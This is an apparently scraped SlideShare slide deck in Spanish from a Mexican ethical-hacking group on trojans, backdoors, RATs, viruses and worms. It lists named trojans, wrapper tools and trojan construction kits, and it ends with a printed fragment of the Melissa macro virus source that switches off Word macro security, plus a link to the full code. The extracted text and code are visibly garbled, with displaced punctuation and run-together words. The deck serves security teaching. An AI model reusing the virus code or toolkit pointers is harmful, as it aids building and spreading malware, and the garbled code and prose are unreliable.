SlideShare una empresa de Scribd logo
  
Organización Mexicana de Hackers Éticos
Troyanos, backdoors, virus y 
gusanos.
  
2Los trojanos y los backdoors son caminos del hacker
,para ganar acceso al sistema contando con la
caracteristica de ser instalados en el sistema por otro
.programa o por usuarios
Los virus y gusanos son codigos maliciosos destructivos
.para sistemas y redes Los trojanos y los backdoors
. ,son un tipo de virus Por definicion los virus
transportan trojanos ejecutables que infectan a un
.sistema creando un backdoors para los hackers
Definiciones
  
4 .Esquema general de estos terminos
 VIRUS
➢ Worm
➢ Troyano
✔ Backdoor
Virus
  
.Backdoors Esunprogramaqueel hacker instalaenunsistemapara
.permitirel acceso
:Ventajas
 .Removerlaevidenciadelaentradainicial deloslogsdel sistema
 .Retener el accesoalamaquina
 Paraocultarloseañadeunnuevoservicioyselepuededarun
,nombredel cual nosesospecheomejoraun utilizar unservicio
,quenucaseuse queesteactivadomanualmenteototalmente
.deshabilitado
Backdoors.
  
' ( )LosRAT s RemoteAdministrationTrojans sonunaclasede
.backdoorsusadosparahabilitar el accesoremoto Estosproveen
,aparentementeunafuncionusual enel sistema peroal mismo
, .tiempo abrenunpuertodelavictima Unavezqueel RATes
, ,activado sehacepasar por unexecuable interactuandoconlas
llavesderegistroresponsablesdeiniciar losprocesosyalgunas
.vecescreansusupropiosservicios
' .AlgunosRAT sconstandeunclienteyunservidor El servidorse
instalaenlamaquinainfectadayel clienteesusadopor el intruso
.del sistema
Backdoors.
  
Es un programa malicioso que pasa por un programa inofensivo y se
.encuentran anexos a otros programas o paquetes de software
:Estos pueden causar
 robo o perdida de información
 colapso del sistema
 lentitud de sistemas
 ( )ataques DDOS Distributed Denial of service
 manipular archivos
 controlar procesos
 correr comandos remotos
 actuar como keyloggers
 ver pantallas
 .reiniciar o apagar el sistema victima
Troyanos
  
Son usualmente instalados en un sistema sin el conocimiento de los
.usuarios
:El trojano puede ser mandado a una victima de diferentes maneras
 Como archivo adjunto en el mensajero
 Adjunto en un correo
 Compartiendo archivos por NetBIOS
 Varios programas como el freeware
 Herramientas para remover spyware
 Optimizadores de sistemas
 Salva pantallas
 musica
 , .fotos juegos y videos
Troyanos
  
( )Uncanal abierto overt channel es unnormal y legitimo
caminoquelos programas usanpara comunicarse dentro
. (de una computadora ounared Uncanal secreto covert
)channel usacaminos paracomunicarse de una manera
.ilicitadentro del sistema
Los trojanos usanel covert channel paramandar
instrucciones aloscomponentes del servidor para
.comprometer un sistema
Una técnica de covert channel es la llamada tunnelingque
.consta demandar unprotocolosobre otro
Overt and Covert Channels
  
1. 'RAT s( )-Remote AccessTrojans usado paraobtener acceso al
.sistema
2. -Data Sending Trojans-usadoparaencontrar información y
.mandarlaal hacker
3. Destructive Trojans-usado paraborrar ocorromper archivos enel
.sistema
4. Denial of services Trojans- usado pararealizar unataque de
.denegacion de servicio
5. Proxy Trojans-usadopararealizar tunelesy situar ataques enel
.sistema
6. FTP Trojans. .usado paracrear un FTPserver paracopiar archivos
7. Security Software Disabler Trojans- usado paradetener un
.antivirus
Tipos de Troyanos
  
Permiten al atacante accesar a una maquina de la red
.interna desde afuera
,En un intervalo de tiempo el servidor trata de
conectarse a un servidor externo para recoger
.comandos a ejecutar
.Conexiones en reversa como ataques
  
- _TROJ QAZ
-Tini
-ComputerSpy Key Logger
-Beast
-CyberSpy
-SubRoot
-LetMeRule
- 2000Firekiller
-The Hard Drive Killer Pro
- . ,Netcat Usa linea de comandos para abrir puertos TCP y UDP
.regresando una shell remota del sistema
Ejemplos de Troyanos
-DonaldDick
-Netbus
-SubSeven
- 2000BackOrifice
-BoSniffer
  
-Los programas arrancan sin ninguna intervención del
.usuario
- .El CDROM se abre o cierra
- ,Cambian los wallpapers fondo de pantalla o screen
.saver por si solos
- .Se abre el navegador con sitios que no se le indicaron
- ,En resumen cualquier acción que el usuario no le
.indico realizar
Indicios de ataques
  
.Es el softwareque sonusados paraentregar untrojano Este
.programa es legitimopero contieneel codigo malicioso
Usualmente son programas comojuegosque sepueden
.instalar facilmente
:Ejemplos
- Graffiti
- 2000Silk Rope
- EliTeWrap
-IconPlus
Wrapping
  
Sonherramientas generadorasde trojanos que permiteal
.hacker crear supropiotroyano Estas herramientas son
,muy peligrosasporque puedes crear undaño ati mismo si
.notienes los conocimientos de lo que se estahaciendo
:Algunas herramientas son
- SennaSpyGenerator
- . 2.0TrojanHorse ConstructionKit v
- Progenic Mail Trojan Construction Kit
- 'Pandora s Box
Kits para Construcción de Troyanos
  
Tener un antivirus en modo de monitoreo y no instalar
.software free Se pueden utilizar herramientas de
monitoreo de puertos para vigilar la actividad de los
.mismos
Medidas de prevención contra troyanos
  
,Unvirus yungusanos sonsimilares ambos sonmalwarey su
.diferenciaradica ensuformade propagacion
Unvirus infecta unarchivo ejecutable ylo usapara
.reproducirse por este medio El código del virus es
inyectadoenunprogramabenignoy esperaaquese
, ,ejecute el programa esto funciona por ejemploenmacros
, , ,juegos adjuntos encorreos script de visual basic
, .animaciones etc
,El gusanoes untipo devirus perosereplica
, .automaticamente nonecesitade unprogramaasociado
Virus y Gusanos
  
:Se clasificanacorde ados factores que infectay comolo
.hace El virus puede infectar los siguientescomponentes
:del sistema
- .Sectores del sistema
- Archivos
- Macros
- ArchivosDLL eINI
- Clustersde discos
- ArchivosBatch
- Códigofuente
Tipos de virus
  
.La infección del virus es a traves de la interaccion con el sistema Los
:virus son categorizados conforme a su técnica de infección
 .Polymorphic viruses Encripta el código de varias maneras en cada
infección y puede cargar los diferentes formas para evadir su
.detección
 .Stealth viruses ,Esconde las caracteristicas normales del virus tal
como el tiempo y la fecha del archivo infectado para prevenir que se
.detecte un nuevo archivo y sea escaneado
 Fast and slow infectors. Evade la detección por una infección muy
.rapida o lenta
 .Sparse infectors .Infectan solo a pequeños sistemas y aplicaciones
Como se extiende e infecta un virus
  
 .Armored viruses .Estan encriptados para prevenir la deteccion
 Multipartite viruses. Son virus avanzados creado para realizar
- .multi infecciones
 ( - )Cavity Space filler viruses. Atacan áreas vacias o archivos
.vacios
 .Tunneling viruses Son eviados vía diferentes protocolos o
.encriptados para evitar una detección
 .Camouflage viruses .Aparecen como otro programa
 NTFS and Active Directory viruses. Atacan especificamente
.archivos NT o archivos de active directory en sistemas windows
Como se extiende e infecta un virus
  
 Intercepción: monitorea constantemente la actividad del disco o peticiones  y 
esta formado por un driver virtual dependiendo del S.O.
Los motores de busqueda puede ser:

Comparación de firma de virus: Comparar trozos de código malicioso.

Método heurístico: Analiza procedimientos buscando acciones que puedan 
dañar al sistema.
Los antivirus deben ser residentes o sea que estan constantemente vigilando la 
actividad y sobre demanda, los cuales realizan escaneos cuando se le indica.
Que hace un antivirus?
  
// Melissa Virus Source Code
_ ()Private Sub Document Open
On Error Resume Next
. ("",If System PrivateProfileString
" _ _    9.0  ", " ") <> ""HKEY CURRENT USER Software Microsoft Office Word Security Level
Then
(" "). (" ..."). =CommandBars Macro Controls Security Enabled False
. ("",System PrivateProfileString
" _ _    9.0  ", " ") = 1&HKEY CURRENT USER Software Microsoft Office Word Security Level
Else
(" "). (" "). =CommandBars Tools Controls Macro Enabled False
. = (1 - 1): . = (1 - 1):Options ConfirmConversions Options VirusProtection
. = (1 - 1)Options SaveNormalPrompt
End If
, ,Dim UngaDasOutlook DasMapiName BreakUmOffASlice
= (" . ")Set UngaDasOutlook CreateObject Outlook Application
= . (" ")Set DasMapiName UngaDasOutlook GetNameSpace MAPI
. ("",If System PrivateProfileString
" _ _    ", " ?") <> "... "HKEY CURRENT USER Software Microsoft Office Melissa by Kwyjibo
Then
= " "If UngaDasOutlook Outlook Then
. " ", " "DasMapiName Logon profile password
..........
:codigo completo en
:// .62 . . /62 / / .http www nds co nz nds documents melissa txt
Ejemplo: Trozo de Código virus Melissa.
  
Final
Preguntas??
GRACIAS
Javier–-demos
fj@omhe.org

Más contenido relacionado

La actualidad más candente

Virus
VirusVirus
Virus informatico
Virus informatico Virus informatico
Virus informatico
Sharon Victoria Attar
 
Virus, troyano spyware
Virus, troyano spywareVirus, troyano spyware
Virus, troyano spyware
LizMari12
 
Amenazas en linea
Amenazas en lineaAmenazas en linea
Amenazas en linea
Pedro Cobarrubias
 
Virus y antivirus
Virus y antivirusVirus y antivirus
Virus y antivirus
ArohayAna
 
Amenazas en linea
Amenazas en lineaAmenazas en linea
Amenazas en linea
Tavo Adame
 
Que son virus informático anderson stivens bautista oviedo
Que son virus informático anderson stivens bautista oviedoQue son virus informático anderson stivens bautista oviedo
Que son virus informático anderson stivens bautista oviedo
bauti03
 
Virus y vacunas informaticas
Virus y vacunas informaticasVirus y vacunas informaticas
Virus y vacunas informaticas
williamcaterpillar
 
Virus troyano
Virus troyanoVirus troyano
Virus troyano
LuizetRuiz
 
Trabajo de seguridad informatica hammad
Trabajo de seguridad informatica hammadTrabajo de seguridad informatica hammad
Trabajo de seguridad informatica hammad
hammad rafqat
 
Amenazas y riesgos
Amenazas y riesgosAmenazas y riesgos
Amenazas y riesgos
atehortualuis26
 
Virus y vacunas informáticas
Virus y vacunas informáticas Virus y vacunas informáticas
Virus y vacunas informáticas
khriv
 
Consulta
ConsultaConsulta
Explicación tipos de virus
Explicación tipos de virusExplicación tipos de virus
Explicación tipos de virus
Sonia Ballesteros
 
Malware
MalwareMalware
Malware
Brandon Perez
 
Virus Informático
Virus InformáticoVirus Informático
Virus informatico
Virus informaticoVirus informatico
Virus informatico
karimruth
 
Malware
MalwareMalware

La actualidad más candente (18)

Virus
VirusVirus
Virus
 
Virus informatico
Virus informatico Virus informatico
Virus informatico
 
Virus, troyano spyware
Virus, troyano spywareVirus, troyano spyware
Virus, troyano spyware
 
Amenazas en linea
Amenazas en lineaAmenazas en linea
Amenazas en linea
 
Virus y antivirus
Virus y antivirusVirus y antivirus
Virus y antivirus
 
Amenazas en linea
Amenazas en lineaAmenazas en linea
Amenazas en linea
 
Que son virus informático anderson stivens bautista oviedo
Que son virus informático anderson stivens bautista oviedoQue son virus informático anderson stivens bautista oviedo
Que son virus informático anderson stivens bautista oviedo
 
Virus y vacunas informaticas
Virus y vacunas informaticasVirus y vacunas informaticas
Virus y vacunas informaticas
 
Virus troyano
Virus troyanoVirus troyano
Virus troyano
 
Trabajo de seguridad informatica hammad
Trabajo de seguridad informatica hammadTrabajo de seguridad informatica hammad
Trabajo de seguridad informatica hammad
 
Amenazas y riesgos
Amenazas y riesgosAmenazas y riesgos
Amenazas y riesgos
 
Virus y vacunas informáticas
Virus y vacunas informáticas Virus y vacunas informáticas
Virus y vacunas informáticas
 
Consulta
ConsultaConsulta
Consulta
 
Explicación tipos de virus
Explicación tipos de virusExplicación tipos de virus
Explicación tipos de virus
 
Malware
MalwareMalware
Malware
 
Virus Informático
Virus InformáticoVirus Informático
Virus Informático
 
Virus informatico
Virus informaticoVirus informatico
Virus informatico
 
Malware
MalwareMalware
Malware
 

Similar a Backdoors, troyanos y otro tipo de malware. OMHE

Trabajo de subida de nota informatica
Trabajo de subida de nota informaticaTrabajo de subida de nota informatica
Trabajo de subida de nota informatica
MiguelAngel2602
 
Seguridad Informatica
Seguridad InformaticaSeguridad Informatica
Seguridad Informatica
Marvyzapata
 
Antivirus informaticos
Antivirus informaticosAntivirus informaticos
Antivirus informaticos
Marvyzapata
 
Antivirus informaticos
Antivirus informaticosAntivirus informaticos
Antivirus informaticos
Marvyzapata
 
Virus y antivirus informaticos
Virus y antivirus informaticosVirus y antivirus informaticos
Virus y antivirus informaticos
Jomicast
 
Conceptos importantes seguridad en la red
Conceptos importantes seguridad en la redConceptos importantes seguridad en la red
Conceptos importantes seguridad en la red
pabloisma
 
Virusy antivirus cubides_julian
Virusy antivirus cubides_julianVirusy antivirus cubides_julian
Virusy antivirus cubides_julian
julian cubides
 
Virus y antivirus informaticos
Virus y antivirus informaticosVirus y antivirus informaticos
Virus y antivirus informaticos
andreabarrera1515
 
Virus y antivirus informaticos
Virus y antivirus informaticosVirus y antivirus informaticos
Virus y antivirus informaticos
andreabarrera1515
 
Virus y vacunas informaticas
Virus y vacunas informaticasVirus y vacunas informaticas
Virus y vacunas informaticas
erikha123
 
Virus Informaticos
Virus Informaticos Virus Informaticos
Virus Informaticos
Yerxon31
 
Malware. Tic's
Malware. Tic'sMalware. Tic's
Malware. Tic's
Margarita Flores Sanchez
 
virus y antivirus
virus y antivirusvirus y antivirus
virus y antivirus
viviana-cardona
 
Virus y vacunas informaticas
Virus y vacunas informaticasVirus y vacunas informaticas
Virus y vacunas informaticas
wilmerojas
 
Virus
VirusVirus
Virus
farell1091
 
Virus informaticos
Virus informaticosVirus informaticos
Virus informaticos
decarito2011
 
Tarea de hj... karen duarte y leydi calderon.......................999999
Tarea de hj... karen duarte y leydi calderon.......................999999Tarea de hj... karen duarte y leydi calderon.......................999999
Tarea de hj... karen duarte y leydi calderon.......................999999
karimduart01
 
Seguridad informática
 Seguridad informática Seguridad informática
Seguridad informática
angelafranelena4a
 
Seguridad
 Seguridad Seguridad
Seguridad
gemaykevin
 
Seguridad
 Seguridad Seguridad
Seguridad
gemaykevin
 

Similar a Backdoors, troyanos y otro tipo de malware. OMHE (20)

Trabajo de subida de nota informatica
Trabajo de subida de nota informaticaTrabajo de subida de nota informatica
Trabajo de subida de nota informatica
 
Seguridad Informatica
Seguridad InformaticaSeguridad Informatica
Seguridad Informatica
 
Antivirus informaticos
Antivirus informaticosAntivirus informaticos
Antivirus informaticos
 
Antivirus informaticos
Antivirus informaticosAntivirus informaticos
Antivirus informaticos
 
Virus y antivirus informaticos
Virus y antivirus informaticosVirus y antivirus informaticos
Virus y antivirus informaticos
 
Conceptos importantes seguridad en la red
Conceptos importantes seguridad en la redConceptos importantes seguridad en la red
Conceptos importantes seguridad en la red
 
Virusy antivirus cubides_julian
Virusy antivirus cubides_julianVirusy antivirus cubides_julian
Virusy antivirus cubides_julian
 
Virus y antivirus informaticos
Virus y antivirus informaticosVirus y antivirus informaticos
Virus y antivirus informaticos
 
Virus y antivirus informaticos
Virus y antivirus informaticosVirus y antivirus informaticos
Virus y antivirus informaticos
 
Virus y vacunas informaticas
Virus y vacunas informaticasVirus y vacunas informaticas
Virus y vacunas informaticas
 
Virus Informaticos
Virus Informaticos Virus Informaticos
Virus Informaticos
 
Malware. Tic's
Malware. Tic'sMalware. Tic's
Malware. Tic's
 
virus y antivirus
virus y antivirusvirus y antivirus
virus y antivirus
 
Virus y vacunas informaticas
Virus y vacunas informaticasVirus y vacunas informaticas
Virus y vacunas informaticas
 
Virus
VirusVirus
Virus
 
Virus informaticos
Virus informaticosVirus informaticos
Virus informaticos
 
Tarea de hj... karen duarte y leydi calderon.......................999999
Tarea de hj... karen duarte y leydi calderon.......................999999Tarea de hj... karen duarte y leydi calderon.......................999999
Tarea de hj... karen duarte y leydi calderon.......................999999
 
Seguridad informática
 Seguridad informática Seguridad informática
Seguridad informática
 
Seguridad
 Seguridad Seguridad
Seguridad
 
Seguridad
 Seguridad Seguridad
Seguridad
 

Más de Héctor López

Conferencia de seguridad en el sector público por la OMHE
Conferencia de seguridad en el sector público por la OMHEConferencia de seguridad en el sector público por la OMHE
Conferencia de seguridad en el sector público por la OMHE
Héctor López
 
Técnicas detrás de los fraudes bancarios
Técnicas detrás de los fraudes bancariosTécnicas detrás de los fraudes bancarios
Técnicas detrás de los fraudes bancarios
Héctor López
 
Omhe implementacion de servicios hacker
Omhe implementacion de servicios hackerOmhe implementacion de servicios hacker
Omhe implementacion de servicios hacker
Héctor López
 
Medidas básicas de seguridad informática para empresas
Medidas básicas de seguridad informática para empresasMedidas básicas de seguridad informática para empresas
Medidas básicas de seguridad informática para empresas
Héctor López
 
System Hacking por la OMHE org
System Hacking por la OMHE orgSystem Hacking por la OMHE org
System Hacking por la OMHE org
Héctor López
 
Escaneo, enumeración de puertos en la red. OMHE
Escaneo, enumeración de puertos en la red. OMHEEscaneo, enumeración de puertos en la red. OMHE
Escaneo, enumeración de puertos en la red. OMHE
Héctor López
 
Hacking utilizando sniffers para interceptar el tráfico. OMHE
Hacking utilizando sniffers para interceptar el tráfico. OMHEHacking utilizando sniffers para interceptar el tráfico. OMHE
Hacking utilizando sniffers para interceptar el tráfico. OMHE
Héctor López
 
Hacking utilizando GNU/Linux por la OMHE
Hacking utilizando GNU/Linux por la OMHEHacking utilizando GNU/Linux por la OMHE
Hacking utilizando GNU/Linux por la OMHE
Héctor López
 
Hacking de servidores web OMHE
Hacking de servidores web OMHEHacking de servidores web OMHE
Hacking de servidores web OMHE
Héctor López
 
Conferencia de Héctor López sobre hacking colaborativo en la Unipol de Durango
Conferencia de Héctor López sobre hacking colaborativo en la Unipol de DurangoConferencia de Héctor López sobre hacking colaborativo en la Unipol de Durango
Conferencia de Héctor López sobre hacking colaborativo en la Unipol de Durango
Héctor López
 
Servicios de seguridad informática
Servicios de seguridad informáticaServicios de seguridad informática
Servicios de seguridad informática
Héctor López
 
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
Héctor López
 
#5minutosdehacking Con Héctor López curso de seguridad informática.
#5minutosdehacking Con Héctor López curso de seguridad informática.#5minutosdehacking Con Héctor López curso de seguridad informática.
#5minutosdehacking Con Héctor López curso de seguridad informática.
Héctor López
 

Más de Héctor López (13)

Conferencia de seguridad en el sector público por la OMHE
Conferencia de seguridad en el sector público por la OMHEConferencia de seguridad en el sector público por la OMHE
Conferencia de seguridad en el sector público por la OMHE
 
Técnicas detrás de los fraudes bancarios
Técnicas detrás de los fraudes bancariosTécnicas detrás de los fraudes bancarios
Técnicas detrás de los fraudes bancarios
 
Omhe implementacion de servicios hacker
Omhe implementacion de servicios hackerOmhe implementacion de servicios hacker
Omhe implementacion de servicios hacker
 
Medidas básicas de seguridad informática para empresas
Medidas básicas de seguridad informática para empresasMedidas básicas de seguridad informática para empresas
Medidas básicas de seguridad informática para empresas
 
System Hacking por la OMHE org
System Hacking por la OMHE orgSystem Hacking por la OMHE org
System Hacking por la OMHE org
 
Escaneo, enumeración de puertos en la red. OMHE
Escaneo, enumeración de puertos en la red. OMHEEscaneo, enumeración de puertos en la red. OMHE
Escaneo, enumeración de puertos en la red. OMHE
 
Hacking utilizando sniffers para interceptar el tráfico. OMHE
Hacking utilizando sniffers para interceptar el tráfico. OMHEHacking utilizando sniffers para interceptar el tráfico. OMHE
Hacking utilizando sniffers para interceptar el tráfico. OMHE
 
Hacking utilizando GNU/Linux por la OMHE
Hacking utilizando GNU/Linux por la OMHEHacking utilizando GNU/Linux por la OMHE
Hacking utilizando GNU/Linux por la OMHE
 
Hacking de servidores web OMHE
Hacking de servidores web OMHEHacking de servidores web OMHE
Hacking de servidores web OMHE
 
Conferencia de Héctor López sobre hacking colaborativo en la Unipol de Durango
Conferencia de Héctor López sobre hacking colaborativo en la Unipol de DurangoConferencia de Héctor López sobre hacking colaborativo en la Unipol de Durango
Conferencia de Héctor López sobre hacking colaborativo en la Unipol de Durango
 
Servicios de seguridad informática
Servicios de seguridad informáticaServicios de seguridad informática
Servicios de seguridad informática
 
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
 
#5minutosdehacking Con Héctor López curso de seguridad informática.
#5minutosdehacking Con Héctor López curso de seguridad informática.#5minutosdehacking Con Héctor López curso de seguridad informática.
#5minutosdehacking Con Héctor López curso de seguridad informática.
 

Backdoors, troyanos y otro tipo de malware. OMHE

  • 2.    2Los trojanos y los backdoors son caminos del hacker ,para ganar acceso al sistema contando con la caracteristica de ser instalados en el sistema por otro .programa o por usuarios Los virus y gusanos son codigos maliciosos destructivos .para sistemas y redes Los trojanos y los backdoors . ,son un tipo de virus Por definicion los virus transportan trojanos ejecutables que infectan a un .sistema creando un backdoors para los hackers Definiciones
  • 3.    4 .Esquema general de estos terminos  VIRUS ➢ Worm ➢ Troyano ✔ Backdoor Virus
  • 4.    .Backdoors Esunprogramaqueel hacker instalaenunsistemapara .permitirel acceso :Ventajas  .Removerlaevidenciadelaentradainicial deloslogsdel sistema  .Retener el accesoalamaquina  Paraocultarloseañadeunnuevoservicioyselepuededarun ,nombredel cual nosesospecheomejoraun utilizar unservicio ,quenucaseuse queesteactivadomanualmenteototalmente .deshabilitado Backdoors.
  • 5.    ' ( )LosRAT s RemoteAdministrationTrojans sonunaclasede .backdoorsusadosparahabilitar el accesoremoto Estosproveen ,aparentementeunafuncionusual enel sistema peroal mismo , .tiempo abrenunpuertodelavictima Unavezqueel RATes , ,activado sehacepasar por unexecuable interactuandoconlas llavesderegistroresponsablesdeiniciar losprocesosyalgunas .vecescreansusupropiosservicios ' .AlgunosRAT sconstandeunclienteyunservidor El servidorse instalaenlamaquinainfectadayel clienteesusadopor el intruso .del sistema Backdoors.
  • 6.    Es un programa malicioso que pasa por un programa inofensivo y se .encuentran anexos a otros programas o paquetes de software :Estos pueden causar  robo o perdida de información  colapso del sistema  lentitud de sistemas  ( )ataques DDOS Distributed Denial of service  manipular archivos  controlar procesos  correr comandos remotos  actuar como keyloggers  ver pantallas  .reiniciar o apagar el sistema victima Troyanos
  • 7.    Son usualmente instalados en un sistema sin el conocimiento de los .usuarios :El trojano puede ser mandado a una victima de diferentes maneras  Como archivo adjunto en el mensajero  Adjunto en un correo  Compartiendo archivos por NetBIOS  Varios programas como el freeware  Herramientas para remover spyware  Optimizadores de sistemas  Salva pantallas  musica  , .fotos juegos y videos Troyanos
  • 8.    ( )Uncanal abierto overt channel es unnormal y legitimo caminoquelos programas usanpara comunicarse dentro . (de una computadora ounared Uncanal secreto covert )channel usacaminos paracomunicarse de una manera .ilicitadentro del sistema Los trojanos usanel covert channel paramandar instrucciones aloscomponentes del servidor para .comprometer un sistema Una técnica de covert channel es la llamada tunnelingque .consta demandar unprotocolosobre otro Overt and Covert Channels
  • 9.    1. 'RAT s( )-Remote AccessTrojans usado paraobtener acceso al .sistema 2. -Data Sending Trojans-usadoparaencontrar información y .mandarlaal hacker 3. Destructive Trojans-usado paraborrar ocorromper archivos enel .sistema 4. Denial of services Trojans- usado pararealizar unataque de .denegacion de servicio 5. Proxy Trojans-usadopararealizar tunelesy situar ataques enel .sistema 6. FTP Trojans. .usado paracrear un FTPserver paracopiar archivos 7. Security Software Disabler Trojans- usado paradetener un .antivirus Tipos de Troyanos
  • 10.    Permiten al atacante accesar a una maquina de la red .interna desde afuera ,En un intervalo de tiempo el servidor trata de conectarse a un servidor externo para recoger .comandos a ejecutar .Conexiones en reversa como ataques
  • 11.    - _TROJ QAZ -Tini -ComputerSpy Key Logger -Beast -CyberSpy -SubRoot -LetMeRule - 2000Firekiller -The Hard Drive Killer Pro - . ,Netcat Usa linea de comandos para abrir puertos TCP y UDP .regresando una shell remota del sistema Ejemplos de Troyanos -DonaldDick -Netbus -SubSeven - 2000BackOrifice -BoSniffer
  • 12.    -Los programas arrancan sin ninguna intervención del .usuario - .El CDROM se abre o cierra - ,Cambian los wallpapers fondo de pantalla o screen .saver por si solos - .Se abre el navegador con sitios que no se le indicaron - ,En resumen cualquier acción que el usuario no le .indico realizar Indicios de ataques
  • 13.    .Es el softwareque sonusados paraentregar untrojano Este .programa es legitimopero contieneel codigo malicioso Usualmente son programas comojuegosque sepueden .instalar facilmente :Ejemplos - Graffiti - 2000Silk Rope - EliTeWrap -IconPlus Wrapping
  • 14.    Sonherramientas generadorasde trojanos que permiteal .hacker crear supropiotroyano Estas herramientas son ,muy peligrosasporque puedes crear undaño ati mismo si .notienes los conocimientos de lo que se estahaciendo :Algunas herramientas son - SennaSpyGenerator - . 2.0TrojanHorse ConstructionKit v - Progenic Mail Trojan Construction Kit - 'Pandora s Box Kits para Construcción de Troyanos
  • 15.    Tener un antivirus en modo de monitoreo y no instalar .software free Se pueden utilizar herramientas de monitoreo de puertos para vigilar la actividad de los .mismos Medidas de prevención contra troyanos
  • 16.    ,Unvirus yungusanos sonsimilares ambos sonmalwarey su .diferenciaradica ensuformade propagacion Unvirus infecta unarchivo ejecutable ylo usapara .reproducirse por este medio El código del virus es inyectadoenunprogramabenignoy esperaaquese , ,ejecute el programa esto funciona por ejemploenmacros , , ,juegos adjuntos encorreos script de visual basic , .animaciones etc ,El gusanoes untipo devirus perosereplica , .automaticamente nonecesitade unprogramaasociado Virus y Gusanos
  • 17.    :Se clasificanacorde ados factores que infectay comolo .hace El virus puede infectar los siguientescomponentes :del sistema - .Sectores del sistema - Archivos - Macros - ArchivosDLL eINI - Clustersde discos - ArchivosBatch - Códigofuente Tipos de virus
  • 18.    .La infección del virus es a traves de la interaccion con el sistema Los :virus son categorizados conforme a su técnica de infección  .Polymorphic viruses Encripta el código de varias maneras en cada infección y puede cargar los diferentes formas para evadir su .detección  .Stealth viruses ,Esconde las caracteristicas normales del virus tal como el tiempo y la fecha del archivo infectado para prevenir que se .detecte un nuevo archivo y sea escaneado  Fast and slow infectors. Evade la detección por una infección muy .rapida o lenta  .Sparse infectors .Infectan solo a pequeños sistemas y aplicaciones Como se extiende e infecta un virus
  • 19.     .Armored viruses .Estan encriptados para prevenir la deteccion  Multipartite viruses. Son virus avanzados creado para realizar - .multi infecciones  ( - )Cavity Space filler viruses. Atacan áreas vacias o archivos .vacios  .Tunneling viruses Son eviados vía diferentes protocolos o .encriptados para evitar una detección  .Camouflage viruses .Aparecen como otro programa  NTFS and Active Directory viruses. Atacan especificamente .archivos NT o archivos de active directory en sistemas windows Como se extiende e infecta un virus
  • 21.    // Melissa Virus Source Code _ ()Private Sub Document Open On Error Resume Next . ("",If System PrivateProfileString " _ _ 9.0 ", " ") <> ""HKEY CURRENT USER Software Microsoft Office Word Security Level Then (" "). (" ..."). =CommandBars Macro Controls Security Enabled False . ("",System PrivateProfileString " _ _ 9.0 ", " ") = 1&HKEY CURRENT USER Software Microsoft Office Word Security Level Else (" "). (" "). =CommandBars Tools Controls Macro Enabled False . = (1 - 1): . = (1 - 1):Options ConfirmConversions Options VirusProtection . = (1 - 1)Options SaveNormalPrompt End If , ,Dim UngaDasOutlook DasMapiName BreakUmOffASlice = (" . ")Set UngaDasOutlook CreateObject Outlook Application = . (" ")Set DasMapiName UngaDasOutlook GetNameSpace MAPI . ("",If System PrivateProfileString " _ _ ", " ?") <> "... "HKEY CURRENT USER Software Microsoft Office Melissa by Kwyjibo Then = " "If UngaDasOutlook Outlook Then . " ", " "DasMapiName Logon profile password .......... :codigo completo en :// .62 . . /62 / / .http www nds co nz nds documents melissa txt Ejemplo: Trozo de Código virus Melissa.